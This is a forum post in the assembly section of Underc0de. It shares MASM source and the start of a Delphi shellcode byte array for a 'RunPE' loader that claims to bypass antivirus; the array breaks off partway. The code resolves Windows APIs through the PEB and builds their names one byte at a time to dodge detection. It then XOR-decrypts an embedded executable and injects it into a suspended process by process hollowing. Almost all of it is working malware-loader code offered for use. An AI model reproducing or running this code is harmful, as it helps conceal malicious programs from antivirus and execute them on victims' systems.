Underc0de
Programación General => ASM => Mensaje iniciado por: ragaza en Abril 04, 2018, 06:01:24 AM
Código:
.386
.model flat,stdcall
Comment *
[ RunPE ShellCode Bypass AV ] - {Private}
[ Coded By Coldzer0 _ AT4RE ] - [Delphi - MASM Coder]
[ 2010 - 2011 ]
[Skype : coldzer01 ] - [Yahoo : [email protected] ]
[ Home : www.at4re.com - www.mtcoders.com ]
{
Usage : [Delphi]
Make Var with
var
RunPE : procedure(Buffer:PChar;BufferLen:DWORD); stdcall;
#### then in code call it like this #########
Begin
RunPE := @ShellCode[1];
RunPE(@TextFile[1],length(TextFile));
end;
}
*
.code
start:
PUSH EBP
MOV EBP,ESP
ADD ESP,-0378h
PUSH EBX
PUSH ESI
PUSH EDI
ASSUME FS:NOTHING
MOV EAX,DWORD PTR FS:[30h]
MOV EAX,DWORD PTR DS:[EAX+0Ch]
MOV EAX,DWORD PTR DS:[EAX+0Ch]
MOV EAX,DWORD PTR DS:[EAX]
MOV EAX,DWORD PTR DS:[EAX]
MOV EAX,DWORD PTR DS:[EAX+28h] ; Get Module Path
;################# Extract Module Name [UNICODE] ####################
TEST EAX,EAX
AG:
MOV CX,WORD PTR DS:[EAX]
CMP CX,00h
JE OK
INC EAX
INC EAX
JMP AG
OK:
DEC EAX
DEC EAX
MOV CX,WORD PTR DS:[EAX]
CMP CX,5Ch ; '\'
JE OK2
JMP OK
OK2:
INC EAX
INC EAX
;################# Extract Module Name ####################
;################# Convert to UpperCase ####################
MOV CX,WORD PTR DS:[EAX]
CMP CX,61h
JS CHK
SUB EAX,2
XOR EDI,EDI
UP:
MOV CX,WORD PTR DS:[EAX]
INC EDI
CMP CX,39h
JS LO
SUB CX,20h
LO:
MOV WORD PTR DS:[EAX],CX
ADD EAX,2
CMP CX,0
JNE UP
SUB EAX,EDI
SUB EAX,EDI
;################# Convert to UpperCase ####################
;################# Check Module Name [Kernel32 [UNICODE]] ######################
CHK:
MOV CX,WORD PTR DS:[EAX]
CMP CX,4Bh ; K
JNZ AV
MOV CX,WORD PTR DS:[EAX+2h]
CMP ECX,45h ; E
JNZ AV
MOV CX,WORD PTR DS:[EAX+4h]
CMP ECX,52h ; R
JNZ AV
MOV CX,WORD PTR DS:[EAX+6h]
CMP ECX,4Eh ; N
JNZ AV
MOV CX,WORD PTR DS:[EAX+8h]
CMP ECX,45h ; E
JNZ AV
MOV CX,WORD PTR DS:[EAX+0Ah]
CMP ECX,4Ch ; L
JNZ AV
MOV CX,WORD PTR DS:[EAX+0Ch]
CMP ECX,33h ; 3
JNZ AV
MOV CX,WORD PTR DS:[EAX+0Eh]
CMP ECX,32h ; 2
JNZ AV
;********* Normal Mode *******
ASSUME FS:NOTHING
MOV EAX,DWORD PTR FS:[30h]
MOV EAX,DWORD PTR DS:[EAX+0Ch]
MOV EAX,DWORD PTR DS:[EAX+0Ch]
MOV EAX,DWORD PTR DS:[EAX]
MOV EAX,DWORD PTR DS:[EAX]
MOV EAX,DWORD PTR DS:[EAX+18h]
JMP GO
;~~~~~~~~~~~ AV Mode ~~~~~~~~~~~
AV:
ASSUME FS:NOTHING
MOV EAX,DWORD PTR FS:[30h]
MOV EAX,DWORD PTR DS:[EAX+0Ch]
MOV EAX,DWORD PTR DS:[EAX+0Ch]
MOV EAX,DWORD PTR DS:[EAX]
MOV EAX,DWORD PTR DS:[EAX] ; First Module [AV]
MOV EAX,DWORD PTR DS:[EAX] ; For AV [Kernel is Second Module]
MOV EAX,DWORD PTR DS:[EAX+18h]
;################# Check Module Name ######################
GO:
MOV DWORD PTR SS:[EBP-4h],EAX ; Save Kernel Base
MOV BYTE PTR SS:[EBP-28h],47h
MOV BYTE PTR SS:[EBP-27h],50h
MOV BYTE PTR SS:[EBP-26h],41h
XOR EAX,EAX
MOV DWORD PTR SS:[EBP-14h],EAX
MOV EAX,DWORD PTR SS:[EBP-4h]
MOV EAX,DWORD PTR DS:[EAX+3Ch]
ADD EAX,DWORD PTR SS:[EBP-4h]
MOV EDX,DWORD PTR DS:[EAX+78h]
MOV DWORD PTR SS:[EBP-44h],EDX
MOV EDX,DWORD PTR DS:[EAX+7Ch]
MOV DWORD PTR SS:[EBP-40h],EDX
MOV EAX,DWORD PTR SS:[EBP-4h]
ADD EAX,DWORD PTR SS:[EBP-44h]
MOV ESI,DWORD PTR DS:[EAX+18h]
DEC ESI
TEST ESI,ESI
JB LoadAPI
INC ESI
XOR EDX,EDX
LoopAPI:
MOV ECX,DWORD PTR DS:[EAX+20h]
ADD ECX,DWORD PTR SS:[EBP-4h]
MOV EBX,EDX
SHL EBX,2h
ADD ECX,EBX
MOV EDI,DWORD PTR DS:[ECX+0Ch]
ADD EDI,DWORD PTR SS:[EBP-4h]
MOV BL,BYTE PTR DS:[EDI]
CMP BL,BYTE PTR SS:[EBP-28h]
JNZ CheckAPI
MOV BL,BYTE PTR DS:[EDI+3h]
CMP BL,BYTE PTR SS:[EBP-27h]
JNZ CheckAPI
MOV CL,BYTE PTR DS:[EDI+7h]
CMP CL,BYTE PTR SS:[EBP-26h]
JNZ CheckAPI
MOV ECX,DWORD PTR DS:[EAX+24h]
ADD ECX,DWORD PTR SS:[EBP-4h]
MOV EBX,EDX
ADD EBX,EBX
ADD ECX,EBX
MOV CX,WORD PTR DS:[ECX]
ADD CX,3h
MOV EAX,DWORD PTR DS:[EAX+1Ch]
ADD EAX,DWORD PTR SS:[EBP-4h]
MOVZX ECX,CX
SHL ECX,2h
ADD EAX,ECX
MOV ESI,DWORD PTR DS:[EAX]
ADD ESI,DWORD PTR SS:[EBP-4h]
MOV DWORD PTR SS:[EBP-14h],ESI
JMP LoadAPI
CheckAPI:
INC EDX
DEC ESI
JNZ LoopAPI
LoadAPI: ; [ Write API To An Pointer - use later ]
MOV BYTE PTR SS:[EBP-69h],47h
MOV BYTE PTR SS:[EBP-68h],65h
MOV BYTE PTR SS:[EBP-67h],74h
MOV BYTE PTR SS:[EBP-66h],4Dh
MOV BYTE PTR SS:[EBP-65h],6Fh
MOV BYTE PTR SS:[EBP-64h],64h
MOV BYTE PTR SS:[EBP-63h],75h
MOV BYTE PTR SS:[EBP-62h],6Ch
MOV BYTE PTR SS:[EBP-61h],65h
MOV BYTE PTR SS:[EBP-60h],48h
MOV BYTE PTR SS:[EBP-5Fh],61h
MOV BYTE PTR SS:[EBP-5Eh],6Eh
MOV BYTE PTR SS:[EBP-5Dh],64h
MOV BYTE PTR SS:[EBP-5Ch],6Ch
MOV BYTE PTR SS:[EBP-5Bh],65h
MOV BYTE PTR SS:[EBP-5Ah],41h
MOV BYTE PTR SS:[EBP-59h],0h
MOV BYTE PTR SS:[EBP-7Ch],47h
MOV BYTE PTR SS:[EBP-7Bh],65h
MOV BYTE PTR SS:[EBP-7Ah],74h
MOV BYTE PTR SS:[EBP-79h],4Dh
MOV BYTE PTR SS:[EBP-78h],6Fh
MOV BYTE PTR SS:[EBP-77h],64h
MOV BYTE PTR SS:[EBP-76h],75h
MOV BYTE PTR SS:[EBP-75h],6Ch
MOV BYTE PTR SS:[EBP-74h],65h
MOV BYTE PTR SS:[EBP-73h],46h
MOV BYTE PTR SS:[EBP-72h],69h
MOV BYTE PTR SS:[EBP-71h],6Ch
MOV BYTE PTR SS:[EBP-70h],65h
MOV BYTE PTR SS:[EBP-6Fh],4Eh
MOV BYTE PTR SS:[EBP-6Eh],61h
MOV BYTE PTR SS:[EBP-6Dh],6Dh
MOV BYTE PTR SS:[EBP-6Ch],65h
MOV BYTE PTR SS:[EBP-6Bh],41h
MOV BYTE PTR SS:[EBP-6Ah],0h
MOV BYTE PTR SS:[EBP-91h],5Ah
MOV BYTE PTR SS:[EBP-90h],77h
MOV BYTE PTR SS:[EBP-8Fh],55h
MOV BYTE PTR SS:[EBP-8Eh],6Eh
MOV BYTE PTR SS:[EBP-8Dh],6Dh
MOV BYTE PTR SS:[EBP-8Ch],61h
MOV BYTE PTR SS:[EBP-8Bh],70h
MOV BYTE PTR SS:[EBP-8Ah],56h
MOV BYTE PTR SS:[EBP-89h],69h
MOV BYTE PTR SS:[EBP-88h],65h
MOV BYTE PTR SS:[EBP-87h],77h
MOV BYTE PTR SS:[EBP-86h],4Fh
MOV BYTE PTR SS:[EBP-85h],66h
MOV BYTE PTR SS:[EBP-84h],53h
MOV BYTE PTR SS:[EBP-83h],65h
MOV BYTE PTR SS:[EBP-82h],63h
MOV BYTE PTR SS:[EBP-81h],74h
MOV BYTE PTR SS:[EBP-80h],69h
MOV BYTE PTR SS:[EBP-7Fh],6Fh
MOV BYTE PTR SS:[EBP-7Eh],6Eh
MOV BYTE PTR SS:[EBP-7Dh],0h
MOV BYTE PTR SS:[EBP-0A0h],56h
MOV BYTE PTR SS:[EBP-9Fh],69h
MOV BYTE PTR SS:[EBP-9Eh],72h
MOV BYTE PTR SS:[EBP-9Dh],74h
MOV BYTE PTR SS:[EBP-9Ch],75h
MOV BYTE PTR SS:[EBP-9Bh],61h
MOV BYTE PTR SS:[EBP-9Ah],6Ch
MOV BYTE PTR SS:[EBP-99h],41h
MOV BYTE PTR SS:[EBP-98h],6Ch
MOV BYTE PTR SS:[EBP-97h],6Ch
MOV BYTE PTR SS:[EBP-96h],6Fh
MOV BYTE PTR SS:[EBP-95h],63h
MOV BYTE PTR SS:[EBP-94h],45h
MOV BYTE PTR SS:[EBP-93h],78h
MOV BYTE PTR SS:[EBP-92h],0h
MOV BYTE PTR SS:[EBP-0B1h],56h
MOV BYTE PTR SS:[EBP-0B0h],69h
MOV BYTE PTR SS:[EBP-0AFh],72h
MOV BYTE PTR SS:[EBP-0AEh],74h
MOV BYTE PTR SS:[EBP-0ADh],75h
MOV BYTE PTR SS:[EBP-0ACh],61h
MOV BYTE PTR SS:[EBP-0ABh],6Ch
MOV BYTE PTR SS:[EBP-0AAh],50h
MOV BYTE PTR SS:[EBP-0A9h],72h
MOV BYTE PTR SS:[EBP-0A8h],6Fh
MOV BYTE PTR SS:[EBP-0A7h],74h
MOV BYTE PTR SS:[EBP-0A6h],65h
MOV BYTE PTR SS:[EBP-0A5h],63h
MOV BYTE PTR SS:[EBP-0A4h],74h
MOV BYTE PTR SS:[EBP-0A3h],45h
MOV BYTE PTR SS:[EBP-0A2h],78h
MOV BYTE PTR SS:[EBP-0A1h],0h
MOV BYTE PTR SS:[EBP-0C3h],52h
MOV BYTE PTR SS:[EBP-0C2h],65h
MOV BYTE PTR SS:[EBP-0C1h],61h
MOV BYTE PTR SS:[EBP-0C0h],64h
MOV BYTE PTR SS:[EBP-0BFh],50h
MOV BYTE PTR SS:[EBP-0BEh],72h
MOV BYTE PTR SS:[EBP-0BDh],6Fh
MOV BYTE PTR SS:[EBP-0BCh],63h
MOV BYTE PTR SS:[EBP-0BBh],65h
MOV BYTE PTR SS:[EBP-0BAh],73h
MOV BYTE PTR SS:[EBP-0B9h],73h
MOV BYTE PTR SS:[EBP-0B8h],4Dh
MOV BYTE PTR SS:[EBP-0B7h],65h
MOV BYTE PTR SS:[EBP-0B6h],6Dh
MOV BYTE PTR SS:[EBP-0B5h],6Fh
MOV BYTE PTR SS:[EBP-0B4h],72h
MOV BYTE PTR SS:[EBP-0B3h],79h
MOV BYTE PTR SS:[EBP-0B2h],0h
MOV BYTE PTR SS:[EBP-0D6h],57h
MOV BYTE PTR SS:[EBP-0D5h],72h
MOV BYTE PTR SS:[EBP-0D4h],69h
MOV BYTE PTR SS:[EBP-0D3h],74h
MOV BYTE PTR SS:[EBP-0D2h],65h
MOV BYTE PTR SS:[EBP-0D1h],50h
MOV BYTE PTR SS:[EBP-0D0h],72h
MOV BYTE PTR SS:[EBP-0CFh],6Fh
MOV BYTE PTR SS:[EBP-0CEh],63h
MOV BYTE PTR SS:[EBP-0CDh],65h
MOV BYTE PTR SS:[EBP-0CCh],73h
MOV BYTE PTR SS:[EBP-0CBh],73h
MOV BYTE PTR SS:[EBP-0CAh],4Dh
MOV BYTE PTR SS:[EBP-0C9h],65h
MOV BYTE PTR SS:[EBP-0C8h],6Dh
MOV BYTE PTR SS:[EBP-0C7h],6Fh
MOV BYTE PTR SS:[EBP-0C6h],72h
MOV BYTE PTR SS:[EBP-0C5h],79h
MOV BYTE PTR SS:[EBP-0C4h],0h
MOV BYTE PTR SS:[EBP-0E7h],47h
MOV BYTE PTR SS:[EBP-0E6h],65h
MOV BYTE PTR SS:[EBP-0E5h],74h
MOV BYTE PTR SS:[EBP-0E4h],54h
MOV BYTE PTR SS:[EBP-0E3h],68h
MOV BYTE PTR SS:[EBP-0E2h],72h
MOV BYTE PTR SS:[EBP-0E1h],65h
MOV BYTE PTR SS:[EBP-0E0h],61h
MOV BYTE PTR SS:[EBP-0DFh],64h
MOV BYTE PTR SS:[EBP-0DEh],43h
MOV BYTE PTR SS:[EBP-0DDh],6Fh
MOV BYTE PTR SS:[EBP-0DCh],6Eh
MOV BYTE PTR SS:[EBP-0DBh],74h
MOV BYTE PTR SS:[EBP-0DAh],65h
MOV BYTE PTR SS:[EBP-0D9h],78h
MOV BYTE PTR SS:[EBP-0D8h],74h
MOV BYTE PTR SS:[EBP-0D7h],0h
MOV BYTE PTR SS:[EBP-0F8h],53h
MOV BYTE PTR SS:[EBP-0F7h],65h
MOV BYTE PTR SS:[EBP-0F6h],74h
MOV BYTE PTR SS:[EBP-0F5h],54h
MOV BYTE PTR SS:[EBP-0F4h],68h
MOV BYTE PTR SS:[EBP-0F3h],72h
MOV BYTE PTR SS:[EBP-0F2h],65h
MOV BYTE PTR SS:[EBP-0F1h],61h
MOV BYTE PTR SS:[EBP-0F0h],64h
MOV BYTE PTR SS:[EBP-0EFh],43h
MOV BYTE PTR SS:[EBP-0EEh],6Fh
MOV BYTE PTR SS:[EBP-0EDh],6Eh
MOV BYTE PTR SS:[EBP-0ECh],74h
MOV BYTE PTR SS:[EBP-0EBh],65h
MOV BYTE PTR SS:[EBP-0EAh],78h
MOV BYTE PTR SS:[EBP-0E9h],74h
MOV BYTE PTR SS:[EBP-0E8h],0h
MOV BYTE PTR SS:[EBP-0105h],52h
MOV BYTE PTR SS:[EBP-0104h],65h
MOV BYTE PTR SS:[EBP-0103h],73h
MOV BYTE PTR SS:[EBP-0102h],75h
MOV BYTE PTR SS:[EBP-0101h],6Dh
MOV BYTE PTR SS:[EBP-0100h],65h
MOV BYTE PTR SS:[EBP-0FFh],54h
MOV BYTE PTR SS:[EBP-0FEh],68h
MOV BYTE PTR SS:[EBP-0FDh],72h
MOV BYTE PTR SS:[EBP-0FCh],65h
MOV BYTE PTR SS:[EBP-0FBh],61h
MOV BYTE PTR SS:[EBP-0FAh],64h
MOV BYTE PTR SS:[EBP-0F9h],0h
MOV BYTE PTR SS:[EBP-01Eh],6Eh
MOV BYTE PTR SS:[EBP-01Dh],74h
MOV BYTE PTR SS:[EBP-01Ch],64h
MOV BYTE PTR SS:[EBP-01Bh],6Ch
MOV BYTE PTR SS:[EBP-01Ah],6Ch
MOV BYTE PTR SS:[EBP-019h],0h
MOV BYTE PTR SS:[EBP-0114h],43h
MOV BYTE PTR SS:[EBP-0113h],72h
MOV BYTE PTR SS:[EBP-0112h],65h
MOV BYTE PTR SS:[EBP-0111h],61h
MOV BYTE PTR SS:[EBP-0110h],74h
MOV BYTE PTR SS:[EBP-010Fh],65h
MOV BYTE PTR SS:[EBP-010Eh],50h
MOV BYTE PTR SS:[EBP-010Dh],72h
MOV BYTE PTR SS:[EBP-010Ch],6Fh
MOV BYTE PTR SS:[EBP-010Bh],63h
MOV BYTE PTR SS:[EBP-010Ah],65h
MOV BYTE PTR SS:[EBP-109h],73h
MOV BYTE PTR SS:[EBP-108h],73h
MOV BYTE PTR SS:[EBP-107h],41h
MOV BYTE PTR SS:[EBP-0106h],0h
MOV BYTE PTR SS:[EBP-121h],4Ch
MOV BYTE PTR SS:[EBP-120h],6Fh
MOV BYTE PTR SS:[EBP-11Fh],61h
MOV BYTE PTR SS:[EBP-11Eh],64h
MOV BYTE PTR SS:[EBP-11Dh],4Ch
MOV BYTE PTR SS:[EBP-11Ch],69h
MOV BYTE PTR SS:[EBP-11Bh],62h
MOV BYTE PTR SS:[EBP-11Ah],72h
MOV BYTE PTR SS:[EBP-119h],61h
MOV BYTE PTR SS:[EBP-118h],72h
MOV BYTE PTR SS:[EBP-117h],79h
MOV BYTE PTR SS:[EBP-116h],41h
MOV BYTE PTR SS:[EBP-115h],0h
LEA EAX,DWORD PTR SS:[EBP-121h]
PUSH EAX
MOV EAX,DWORD PTR SS:[EBP-4h]
PUSH EAX
CALL DWORD PTR SS:[EBP-14h]
MOV DWORD PTR SS:[EBP-18h],EAX
MOV ESI,DWORD PTR SS:[EBP+0Ch]
DEC ESI
TEST ESI,ESI
JL CheckLen
INC ESI
XOR EBX,EBX
DeCryptPE:
MOV EAX,DWORD PTR SS:[EBP+8h]
MOV AL,BYTE PTR DS:[EAX+EBX]
XOR AL,2Ah ; XOR Key 1 [ You Can Change It But Should Crypt the File with the New Keys ]
XOR AL,87h ; XOR Key 2
MOV EDX,DWORD PTR SS:[EBP+8h]
MOV BYTE PTR DS:[EDX+EBX],AL
INC EBX
DEC ESI
JNZ DeCryptPE
CheckLen:
MOV EAX,DWORD PTR SS:[EBP+8h]
MOV DWORD PTR SS:[EBP-54h],EAX
LEA EAX,DWORD PTR SS:[EBP-69h]
PUSH EAX
MOV EAX,DWORD PTR SS:[EBP-4h]
PUSH EAX
CALL DWORD PTR SS:[EBP-14h]
MOV EBX,EAX
LEA EAX,DWORD PTR SS:[EBP-7Ch]
PUSH EAX
MOV EAX,DWORD PTR SS:[EBP-4h]
PUSH EAX
CALL DWORD PTR SS:[EBP-14h]
MOV ESI,EAX
PUSH 105
LEA EAX,DWORD PTR SS:[EBP-375h]
PUSH EAX
PUSH 0h
CALL EBX
PUSH EAX
CALL ESI
LEA EAX,DWORD PTR SS:[EBP-184h]
MOV EBX,43h
GetS4C:
MOV BYTE PTR DS:[EAX+EBX],0h
DEC EBX
CMP EBX,-1h
JNZ GetS4C
MOV DWORD PTR SS:[EBP-184h],44h
LEA EAX,DWORD PTR SS:[EBP-114h]
PUSH EAX
MOV EAX,DWORD PTR SS:[EBP-4h]
PUSH EAX
CALL DWORD PTR SS:[EBP-14h]
MOV EBX,EAX
LEA EAX,DWORD PTR SS:[EBP-140h]
PUSH EAX
LEA EAX,DWORD PTR SS:[EBP-184h]
PUSH EAX
PUSH 0h
PUSH 0h
PUSH 4h
PUSH 0h
PUSH 0h
PUSH 0h
LEA EAX,DWORD PTR SS:[EBP-375h]
PUSH EAX
PUSH 0
CALL EBX
LEA EAX,DWORD PTR SS:[EBP-0E7h]
PUSH EAX
MOV EAX,DWORD PTR SS:[EBP-4h]
PUSH EAX
CALL DWORD PTR SS:[EBP-14h]
MOV EBX,EAX
MOV DWORD PTR SS:[EBP-250h],10007h
LEA EAX,DWORD PTR SS:[EBP-250h]
PUSH EAX
MOV EAX,DWORD PTR SS:[EBP-13Ch]
PUSH EAX
CALL EBX
LEA EAX,DWORD PTR SS:[EBP-0C3h]
PUSH EAX
MOV EAX,DWORD PTR SS:[EBP-4h]
PUSH EAX
CALL DWORD PTR SS:[EBP-14h]
MOV EBX,EAX
LEA EAX,DWORD PTR SS:[EBP-30h]
PUSH EAX
PUSH 4h
LEA EAX,DWORD PTR SS:[EBP-38h]
PUSH EAX
MOV EAX,DWORD PTR SS:[EBP-1ACh]
ADD EAX,8h
PUSH EAX
MOV EAX,DWORD PTR SS:[EBP-140h]
PUSH EAX
CALL EBX
LEA EAX,DWORD PTR SS:[EBP-91h]
PUSH EAX
LEA EAX,DWORD PTR SS:[EBP-1Eh]
PUSH EAX
CALL DWORD PTR SS:[EBP-18h]
PUSH EAX
CALL DWORD PTR SS:[EBP-14h]
MOV EBX,EAX
MOV EAX,DWORD PTR SS:[EBP-38h]
PUSH EAX
MOV EAX,DWORD PTR SS:[EBP-140h]
PUSH EAX
CALL EBX
MOV EAX,DWORD PTR SS:[EBP-54h]
MOV EAX,DWORD PTR DS:[EAX+3Ch]
ADD EAX,DWORD PTR SS:[EBP-54h]
MOV DWORD PTR SS:[EBP-2Ch],EAX
LEA EAX,DWORD PTR SS:[EBP-0A0h]
PUSH EAX
MOV EAX,DWORD PTR SS:[EBP-4h]
PUSH EAX
CALL DWORD PTR SS:[EBP-14h]
MOV EBX,EAX
PUSH 40h
PUSH 3000h
MOV EAX,DWORD PTR SS:[EBP-2Ch]
MOV EAX,DWORD PTR DS:[EAX+50h]
PUSH EAX
MOV EAX,DWORD PTR SS:[EBP-2Ch]
MOV EAX,DWORD PTR DS:[EAX+34h]
PUSH EAX
MOV EAX,DWORD PTR SS:[EBP-140h]
PUSH EAX
CALL EBX
MOV DWORD PTR SS:[EBP-38h],EAX
LEA EAX,DWORD PTR SS:[EBP-0D6h]
PUSH EAX
MOV EAX,DWORD PTR SS:[EBP-4h]
PUSH EAX
CALL DWORD PTR SS:[EBP-14h]
MOV DWORD PTR SS:[EBP-0Ch],EAX
LEA EAX,DWORD PTR SS:[EBP-34h]
PUSH EAX
MOV EAX,DWORD PTR SS:[EBP-2Ch]
MOV EAX,DWORD PTR DS:[EAX+54h]
PUSH EAX
MOV EAX,DWORD PTR SS:[EBP-54h]
PUSH EAX
MOV EAX,DWORD PTR SS:[EBP-38h]
PUSH EAX
MOV EAX,DWORD PTR SS:[EBP-140h]
PUSH EAX
CALL DWORD PTR SS:[EBP-0Ch]
MOV EAX,DWORD PTR SS:[EBP-2Ch]
LEA EDI,DWORD PTR DS:[EAX+18h]
MOV EAX,DWORD PTR SS:[EBP-2Ch]
MOVZX EAX,WORD PTR DS:[EAX+14h]
ADD EDI,EAX
LEA EAX,DWORD PTR SS:[EBP-0B1h]
PUSH EAX
MOV EAX,DWORD PTR SS:[EBP-4h]
PUSH EAX
CALL DWORD PTR SS:[EBP-14h]
MOV DWORD PTR SS:[EBP-8h],EAX
MOV DWORD PTR SS:[EBP-270h],1h
MOV DWORD PTR SS:[EBP-26Ch],10h
MOV DWORD PTR SS:[EBP-268h],2h
MOV DWORD PTR SS:[EBP-264h],20h
MOV DWORD PTR SS:[EBP-260h],4h
MOV DWORD PTR SS:[EBP-25Ch],40h
MOV DWORD PTR SS:[EBP-258h],4h
MOV DWORD PTR SS:[EBP-254h],40h
MOV EAX,DWORD PTR SS:[EBP-2Ch]
MOVZX ESI,WORD PTR DS:[EAX+6h]
DEC ESI
TEST ESI,ESI
JL CheckReadP
INC ESI
XOR EBX,EBX
ReadRPLoop:
LEA EAX,DWORD PTR SS:[EBP-34h]
PUSH EAX
LEA EAX,DWORD PTR DS:[EBX+EBX*4h]
MOV EAX,DWORD PTR DS:[EDI+EAX*8h+10h]
PUSH EAX
LEA EAX,DWORD PTR DS:[EBX+EBX*4h]
MOV EAX,DWORD PTR DS:[EDI+EAX*8h+14h]
ADD EAX,DWORD PTR SS:[EBP-54h]
PUSH EAX
LEA EAX,DWORD PTR DS:[EBX+EBX*4h]
MOV EAX,DWORD PTR DS:[EDI+EAX*8h+0Ch]
ADD EAX,DWORD PTR SS:[EBP-38h]
PUSH EAX
MOV EAX,DWORD PTR SS:[EBP-140h]
PUSH EAX
CALL DWORD PTR SS:[EBP-0Ch]
LEA EAX,DWORD PTR SS:[EBP-3Ch]
PUSH EAX
LEA EAX,DWORD PTR DS:[EBX+EBX*4h]
MOV EAX,DWORD PTR DS:[EDI+EAX*8h+24h]
SHR EAX,1Dh
MOV EAX,DWORD PTR SS:[EBP+EAX*4h-270h]
PUSH EAX
LEA EAX,DWORD PTR DS:[EBX+EBX*4h]
MOV EAX,DWORD PTR DS:[EDI+EAX*8h+8h]
PUSH EAX
LEA EAX,DWORD PTR DS:[EBX+EBX*4h]
MOV EAX,DWORD PTR DS:[EDI+EAX*8h+0Ch]
ADD EAX,DWORD PTR SS:[EBP-38h]
PUSH EAX
MOV EAX,DWORD PTR SS:[EBP-140h]
PUSH EAX
CALL DWORD PTR SS:[EBP-8h]
INC EBX
DEC ESI
JNZ ReadRPLoop
CheckReadP:
LEA EAX,DWORD PTR SS:[EBP-34h]
PUSH EAX
PUSH 4h
LEA EAX,DWORD PTR SS:[EBP-38h]
PUSH EAX
MOV EAX,DWORD PTR SS:[EBP-1ACh]
ADD EAX,8h
PUSH EAX
MOV EAX,DWORD PTR SS:[EBP-140h]
PUSH EAX
CALL DWORD PTR SS:[EBP-0Ch]
MOV EAX,DWORD PTR SS:[EBP-2Ch]
MOV EAX,DWORD PTR DS:[EAX+28h]
ADD EAX,DWORD PTR SS:[EBP-38h]
MOV DWORD PTR SS:[EBP-1A0h],EAX
LEA EAX,DWORD PTR SS:[EBP-0F8h]
PUSH EAX
MOV EAX,DWORD PTR SS:[EBP-4h]
PUSH EAX
CALL DWORD PTR SS:[EBP-14h]
MOV EBX,EAX
LEA EAX,DWORD PTR SS:[EBP-250h]
PUSH EAX
MOV EAX,DWORD PTR SS:[EBP-13Ch]
PUSH EAX
CALL EBX
LEA EAX,DWORD PTR SS:[EBP-105h]
PUSH EAX
MOV EAX,DWORD PTR SS:[EBP-4h]
PUSH EAX
CALL DWORD PTR SS:[EBP-14h]
MOV EBX,EAX
MOV EAX,DWORD PTR SS:[EBP-13Ch]
PUSH EAX
CALL EBX
POP EDI
POP ESI
POP EBX
MOV ESP,EBP
POP EBP
RETN 8h
end start
Código en shellcode:
NewRunPE {Bypass AV} : array [0..2376] of Byte =
(
$55,$8B,$EC,$81,$C4,$88,$FC,$FF,$FF,$53,$56,$57,$64,$A1,$30,$00,$00,$00,$8B,$40,$0C,$8B,$40,$0C,$8B,
$00,$8B,$00,$8B,$40,$28,$85,$C0,$66,$8B,$08,$66,$83,$F9,$00,$74,$04,$40,$40,$EB,$F3,$48,$48,$66,$8B,
$08,$66,$83,$F9,$5C,$74,$02,$EB,$F3,$40,$40,$66,$8B,$08,$66,$83,$F9,$4B,$75,$54,$66,$8B,$48,$02,$83,
$F9,$45,$75,$4B,$66,$8B,$48,$04,$83,$F9,$52,$75,$42,$66,$8B,$48,$06,$83,$F9,$4E,$75,$39,$66,$8B,$48,
$08,$83,$F9,$45,$75,$30,$66,$8B,$48,$0A,$83,$F9,$4C,$75,$27,$66,$8B,$48,$0C,$83,$F9,$33,$75,$1E,$66,
$8B,$48,$0E,$83,$F9,$32,$75,$15,$64,$A1,$30,$00,$00,$00,$8B,$40,$0C,$8B,$40,$0C,$8B,$00,$8B,$00,$8B,
$40,$18,$EB,$15,$64,$A1,$30,$00,$00,$00,$8B,$40,$0C,$8B,$40,$0C,$8B,$00,$8B,$00,$8B,$00,$8B,$40,$18,
$89,$45,$FC,$C6,$45,$D8,$47,$C6,$45,$D9,$50,$C6,$45,$DA,$41,$33,$C0,$89,$45,$EC,$8B,$45,$FC,$8B,$40,
$3C,$03,$45,$FC,$8B,$50,$78,$89,$55,$BC,$8B,$50,$7C,$89,$55,$C0,$8B,$45,$FC,$03,$45,$BC,$8B,$70,$18,
$4E,$85,$F6,$72,$5C,$46,$33,$D2,$8B,$48,$20,$03,$4D,$FC,$8B,$DA,$C1,$E3,$02,$03,$CB,$8B,$79,$0C,$03,
$7D,$FC,$8A,$1F,$3A,$5D,$D8,$75,$3B,$8A,$5F,$03,$3A,$5D,$D9,$75,$33,$8A,$4F,$07,$3A,$4D,$DA,$75,$2B,
$8B,$48,$24,$03,$4D,$FC,$8B,$DA,$03,$DB,$03,$CB,$66,$8B,$09,$66,$83,$C1,$03,$8B,$40,$1C,$03,$45,$FC,
$0F,$B7,$C9,$C1,$E1,$02,$03,$C1,$8B,$30,$03,$75,$FC,$89,$75,$EC,$EB,$04,$42,$4E,$75,$A7,$C6,$45,$97,
$47,$C6,$45,$98,$65,$C6,$45,$99,$74,$C6,$45,$9A,$4D,$C6,$45,$9B,$6F,$C6,$45,$9C,$64,$C6,$45,$9D,$75,
$C6,$45,$9E,$6C,$C6,$45,$9F,$65,$C6,$45,$A0,$48,$C6,$45,$A1,$61,$C6,$45,$A2,$6E,$C6,$45,$A3,$64,$C6,
$45,$A4,$6C,$C6,$45,$A5,$65,$C6,$45,$A6,$41,$C6,$45,$A7,$00,$C6,$45,$84,$47,$C6,$45,$85,$65,$C6,$45,
$86,$74,$C6,$45,$87,$4D,$C6,$45,$88,$6F,$C6,$45,$89,$64,$C6,$45,$8A,$75,$C6,$45,$8B,$6C,$C6,$45,$8C,
$65,$C6,$45,$8D,$46,$C6,$45,$8E,$69,$C6,$45,$8F,$6C,$C6,$45,$90,$65,$C6,$45,$91,$4E,$C6,$45,$92,$61,
$C6,$45,$93,$6D,$C6,$45,$94,$65,$C6,$45,$95,$41,$C6,$45,$96,$00,$C6,$85,$6F,$FF,$FF,$FF,$5A,$C6,$85,
$70,$FF,$FF,$FF,$77,$C6,$85,$71,$FF,$FF,$FF,$55,$C6,$85,$72,$FF,$FF,$FF,$6E,$C6,$85,$73,$FF,$FF,$FF,
$6D,$C6,$85,$74,$FF,$FF,$FF,$61,$C6,$85,$75,$FF,$FF,$FF,$70,$C6,$85,$76,$FF,$FF,$FF,$56,$C6,$85,$77,
$FF,$FF,$FF,$69,$C6,$85,$78,$FF,$FF,$FF,$65,$C6,$85,$79,$FF,$FF,$FF,$77,$C6,$85,$7A,$FF,$FF,$FF,$4F,
$C6,$85,$7B,$FF,$FF,$FF,$66,$C6,$85,$7C,$FF,$FF,$FF,$53,$C6,$85,$7D,$FF,$FF,$FF,$65,$C6,$85,$7E,$FF,
$FF,$FF,$63,$C6,$85,$7F,$FF,$FF,$FF,$74,$C6,$45,$80,$69,$C6,$45,$81,$6F,$C6,$45,$82,$6E,$C6,$45,$83,
